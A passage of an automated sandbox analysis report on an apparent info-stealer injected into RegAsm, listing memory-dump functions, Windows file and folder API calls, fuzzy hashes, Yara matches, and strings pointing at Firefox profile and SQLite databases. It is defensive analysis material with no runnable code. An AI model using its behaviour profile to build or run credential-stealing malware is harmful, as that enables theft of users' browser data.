                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                    • API String ID: 0-1873940834
                                                    • Opcode ID: 800d9f74abb46bc539925ff2bb5b33a76ada4b2f2524208af10a210f99a933f2
                                                    • Instruction ID: fabd779339210aeb1dad4edc51fa46da0663f5e7e768f744ea6a30a7cba05e09
                                                    • Opcode Fuzzy Hash: 800d9f74abb46bc539925ff2bb5b33a76ada4b2f2524208af10a210f99a933f2
                                                    • Instruction Fuzzy Hash: 24414CB3D053429BD700DF388D8159AFBE1AF94361F810A29F956532D0E73DF448C682
                                                    Function 1FB49350 Relevance: 10.6, APIs: 7, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72ed71d891d440f4504509f5f8e805f13cb3246e028a777498a28e9448700066
                                                    • Instruction ID: 1237063d8a1ea166d929647c78f1c118aabacbf1a98e40ead71d7ae02bab89ee
                                                    • Opcode Fuzzy Hash: 72ed71d891d440f4504509f5f8e805f13cb3246e028a777498a28e9448700066
                                                    • Instruction Fuzzy Hash: 7D5150705082229BDB109B76EACCA9737B5EF00B79B104164EB47C2351EB37E464FA52
                                                    Function 1FAD15C0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %!0.15g$JSON cannot hold BLOB values$null
                                                    • API String ID: 0-3074873597
                                                    • Opcode ID: 6d83038c4e734cf3cb723c49f177cf66596bd67534c4d46d7af499d1720c8786
                                                    • Instruction ID: 4ae89300b5f7cafa698cce8d07618ad3dcc2b6b08f7b1a8a3d3eb192e30ea9ba
                                                    • Opcode Fuzzy Hash: 6d83038c4e734cf3cb723c49f177cf66596bd67534c4d46d7af499d1720c8786
                                                    • Instruction Fuzzy Hash: F74169B9B04740AEF3105B54EC81BEB77B4DB81329F08062AF551C55D2E3BEB59887E2
                                                    Function 1FA41D50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • no such database: %s, xrefs: 1FA41E05
                                                    • CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN), xrefs: 1FA41E2C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CREATE TABLE x( name TEXT, path TEXT, pageno INTEGER, pagetype TEXT, ncell INTEGER, payload INTEGER, unused INTEGER, mx_payload INTEGER, pgoffset INTEGER, pgsize INTEGER, schema TEXT HIDDEN, aggregate BOOLEAN HIDDEN)$no such database: %s
                                                    • API String ID: 0-1404816483
                                                    • Opcode ID: 1a71c691966eccb7e83c3aa4afdae9702f2482166c7ef31a633ab04d147748c1
                                                    • Instruction ID: dbf39bc301f1263e6975e4edbf85f1bcc8890127989df9c8eec1760a1c0239fa
                                                    • Opcode Fuzzy Hash: 1a71c691966eccb7e83c3aa4afdae9702f2482166c7ef31a633ab04d147748c1
                                                    • Instruction Fuzzy Hash: 7E3130BA7043096BC3115F69EC00BABB7D8FF85265F5505A9FD589B201EA7EF90087E0
                                                    Function 00417659 Relevance: 10.6, APIs: 7, Instructions: 98stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcatA.KERNEL32(?,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004176B3
                                                      • Part of subcall function 00412F92: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00412FBC
                                                    • lstrcatA.KERNEL32(?,00000000), ref: 004176D8
                                                    • lstrcatA.KERNEL32(?,?), ref: 004176F7
                                                    • lstrcatA.KERNEL32(?,?), ref: 0041770B
                                                    • lstrcatA.KERNEL32(?), ref: 0041771E
                                                    • lstrcatA.KERNEL32(?,?), ref: 00417732
                                                    • lstrcatA.KERNEL32(?), ref: 00417745
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 00412F4C: GetFileAttributesA.KERNEL32(00000000,?,0040E526,?,00425200,?,?), ref: 00412F5B
                                                      • Part of subcall function 0041738D: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041739D
                                                      • Part of subcall function 0041738D: HeapAlloc.KERNEL32(00000000), ref: 004173A4
                                                      • Part of subcall function 0041738D: wsprintfA.USER32 ref: 004173BF
                                                      • Part of subcall function 0041738D: FindFirstFileA.KERNEL32(?,?), ref: 004173D6
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                    • String ID:
                                                    • API String ID: 167551676-0
                                                    • Opcode ID: 19d46f79466a16adfb6237fd03812389400bbc0a050d161e9df90e3c44a7870d
                                                    • Instruction ID: c5585e3932353d299f890bbdf4fd6802cc5655e913b06a812739708d6539e0eb
                                                    • Opcode Fuzzy Hash: 19d46f79466a16adfb6237fd03812389400bbc0a050d161e9df90e3c44a7870d
                                                    • Instruction Fuzzy Hash: 2431F1B290421C6BCF10FFB1DD89DDD77BCAB08304F4404A6B615D6051EAB8E6D88F65
                                                    Function 1FAD31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ac8a36534ab633fee14af6b4b5a423e7cad131cf5d9ad1498cb4d511f79c8d2c
                                                    • Instruction ID: 8ab8e2b19b7c88d8ac537c4863f8594805278becdce8271f71eaa62fe118f3c7
                                                    • Opcode Fuzzy Hash: ac8a36534ab633fee14af6b4b5a423e7cad131cf5d9ad1498cb4d511f79c8d2c
                                                    • Instruction Fuzzy Hash: C6F1D0B5A083419FD701CF29D8807AABBE0BF44324F44466DF99A9B241E73EF945CB91
                                                    Function 0040DE18 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 149stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00407CDF: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407D05
                                                      • Part of subcall function 00407CDF: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00407D29
                                                      • Part of subcall function 00407CDF: LocalAlloc.KERNEL32(00000040,?), ref: 00407D48
                                                      • Part of subcall function 00407CDF: ReadFile.KERNEL32(000000FF,00000000,?,0040F582,00000000), ref: 00407D6E
                                                      • Part of subcall function 00407CDF: LocalFree.KERNEL32(00000000), ref: 00407DA0
                                                      • Part of subcall function 00407CDF: CloseHandle.KERNEL32(000000FF), ref: 00407DA9
                                                      • Part of subcall function 00412FD6: LocalAlloc.KERNEL32(00000040,00000001), ref: 00412FF2
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                      • Part of subcall function 0041185B: lstrlenA.KERNEL32(00428E5C,?,00428E5C,?,00000000), ref: 0041186F
                                                      • Part of subcall function 0041185B: lstrcpyA.KERNEL32(00000000,?), ref: 004118A8
                                                      • Part of subcall function 0041185B: lstrcatA.KERNEL32(00000000,00000000), ref: 004118B4
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004117E0: lstrcpyA.KERNEL32(00000000,00000000), ref: 0041182C
                                                      • Part of subcall function 004117E0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041183A
                                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00428FB4,00425200), ref: 0040DEC0
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040DEDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                    • String ID: C@$C@$^userContextId=4294967295$moz-extension+++
                                                    • API String ID: 998311485-138545164
                                                    • Opcode ID: a72a3559896110f6474a71aed108b964a839d875c31ac5ad439b653e2e8a8193
                                                    • Instruction ID: 390c660c022c56871494b74ebfb6bb5724ba9b294bf0ffd1339ba326bfc1dd12
                                                    • Opcode Fuzzy Hash: a72a3559896110f6474a71aed108b964a839d875c31ac5ad439b653e2e8a8193
                                                    • Instruction Fuzzy Hash: 0251EC71D002089ACF04FBF1ED569ED7779AF14308F50812EF526A61E1EF399A48CB59
                                                    Function 004145D9 Relevance: 9.1, APIs: 6, Instructions: 137stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00414601
                                                    • StrCmpCA.SHLWAPI(00000000,004295CC,?,?,00000000), ref: 00414671
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                    • strtok_s.MSVCRT ref: 00414783
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: strtok_s$lstrcpylstrlen
                                                    • String ID:
                                                    • API String ID: 348468850-0
                                                    • Opcode ID: 00231ea341b1bd606fb9bde8bd61a413fedfdbce7b3da8c98345d4e06dc490f6
                                                    • Instruction ID: 812b5d921522d9878ae6b572a8c608e258586ff71476c89f6a289d4f29213e72
                                                    • Opcode Fuzzy Hash: 00231ea341b1bd606fb9bde8bd61a413fedfdbce7b3da8c98345d4e06dc490f6
                                                    • Instruction Fuzzy Hash: A6512C75A0120AEFCB04DF54D985AEE7BB4FF46309F10405AE811AB2A1D738DE91CF95
                                                    Function 1FB573E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
                                                    • API String ID: 0-231581592
                                                    • Opcode ID: 90de8fe93957832ad767fe957235c3d69b5225aec65fbbb9a5b7edf72b73d307
                                                    • Instruction ID: 68ff174d0d7d1d79d21872eaeaf2d1bb2ccb9fec11f249f0a983efb61f0b0534
                                                    • Opcode Fuzzy Hash: 90de8fe93957832ad767fe957235c3d69b5225aec65fbbb9a5b7edf72b73d307
                                                    • Instruction Fuzzy Hash: F4E105B0B043459FD701CF29E880B9ABBE4FF55714F24466CE9489B262E739F944CB92
                                                    Function 1FA46DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • recursively defined fts5 content table, xrefs: 1FA46DE2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: recursively defined fts5 content table
                                                    • API String ID: 0-437020801
                                                    • Opcode ID: 7363e3204ec7485f6bb19d3c3047d25841165f783fad0b55df1cb33193c459ec
                                                    • Instruction ID: 42265b11a2d2f977e800c2d6bc818e88d1c7e38e65f71a01b528be96b7c21805
                                                    • Opcode Fuzzy Hash: 7363e3204ec7485f6bb19d3c3047d25841165f783fad0b55df1cb33193c459ec
                                                    • Instruction Fuzzy Hash: 95D1D2B5905385CFD714CF19C480796BBE0FF89324F680A5EE8858B251E77DE489CB92
                                                    Function 004222A1 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __lock.LIBCMT ref: 004222AF
                                                      • Part of subcall function 00421E6F: __mtinitlocknum.LIBCMT ref: 00421E85
                                                      • Part of subcall function 00421E6F: __amsg_exit.LIBCMT ref: 00421E91
                                                      • Part of subcall function 00421E6F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7,?,?,004219C7,00000000,0042D418,00421A0E,?), ref: 00421E99
                                                    • DecodePointer.KERNEL32(0042D2F8,00000020,004223F2,00000000,00000001,00000000,?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D), ref: 004222EB
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 004222FC
                                                      • Part of subcall function 004229E7: EncodePointer.KERNEL32(00000000,00422F61,00641AE0,00000314,00000000,?,?,?,?,?,00422609,00641AE0,Microsoft Visual C++ Runtime Library,00012010), ref: 004229E9
                                                    • DecodePointer.KERNEL32(-00000004,?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 00422322
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 00422335
                                                    • DecodePointer.KERNEL32(?,00422414,000000FF,?,00421E96,00000011,00000000,?,00422A6E,0000000D,?,?,00422239,00421BF7), ref: 0042233F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
